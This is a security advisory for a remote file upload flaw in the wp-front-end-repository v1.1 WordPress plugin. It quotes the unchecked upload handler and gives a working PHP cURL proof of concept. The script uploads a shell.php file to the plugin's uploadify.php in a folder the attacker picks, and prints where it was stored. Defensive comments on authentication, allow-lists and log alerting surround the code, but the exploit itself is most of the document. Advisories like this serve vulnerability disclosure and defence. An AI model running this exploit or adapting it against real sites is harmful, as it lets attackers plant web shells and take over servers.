Title:Remote file upload vulnerability in wp-front-end-repository v1.1 Wordpress plugin [Previously Discovered]
Lines 26-41 do not do any checking of any sort allowing arbitrary users to upload malicious executable scripts.
26 if (!empty($_FILES)) {
27     $tempFile = $_FILES['Filedata']['tmp_name'];
28     $targetPath = $_REQUEST['folder'];
29     $targetFile = str_replace('//','/',$targetPath) . $_FILES['Filedata']['name'];
. . .
40     move_uploaded_file($tempFile,$targetFile);
41     echo str_replace($_SERVER['DOCUMENT_ROOT'],'',$targetFile);
<?php
/*
 * Exploit for wp-front-end-repository remote shell upload.
 * Larry W. Cashdollar, @_larry0 7/11/2015
 *
 * Proof of concept for the handler excerpt above: one multipart POST to the
 * plugin's bundled uploadify.php, after which the response body is printed.
 *
 * Why the handler accepts it, as far as the excerpt shows:
 *   - the destination directory is taken from $_REQUEST['folder'] (line 28);
 *   - the stored file name is the client-supplied $_FILES['Filedata']['name']
 *     (line 29);
 *   - no check on the caller, the path or the extension is visible before
 *     move_uploaded_file() (line 40). Lines 30-39 are elided on the page, so
 *     this rests on the advisory's statement that no checking is done.
 *
 * Defensive reading: an upload handler of this kind needs an authenticated
 * and authorised caller, a destination chosen by the server rather than by a
 * request parameter, and an allow-list on the stored name and extension; the
 * uploads directory should also not execute PHP. In access logs the request
 * appears as a POST to .../wp-front-end-repository/js/uploadify/uploadify.php,
 * which is worth alerting on wherever the plugin is installed.
 */

// Local path of the file that is sent as the upload body.
$uploadfile="/var/www/shell.php";

// Target endpoint: uploadify.php inside the plugin directory, on the host
// given by the author.
$ch = curl_init("http://www.vapidlabs.com/wp-content/plugins/wp-front-end-repository/js/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);

// Field names mirror what the handler reads: 'Filedata' is the upload slot
// ($_FILES['Filedata']) and 'folder' becomes $targetPath. The leading '@' is
// the legacy cURL marker for "send the file at this path". 'name' is not
// referenced by the excerpted handler lines; the stored name comes from the
// upload's own file name.
curl_setopt($ch, CURLOPT_POSTFIELDS,
    array('Filedata'=>"@$uploadfile",'folder'=>'/usr/share/wordpress/wp-content/uploads/','name'=>'shell.php'));

// Capture the response body as a string instead of writing it to output.
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

// The handler echoes the stored path with DOCUMENT_ROOT stripped (line 41),
// so the response discloses where the uploaded file was written.
print "$postResult";
?>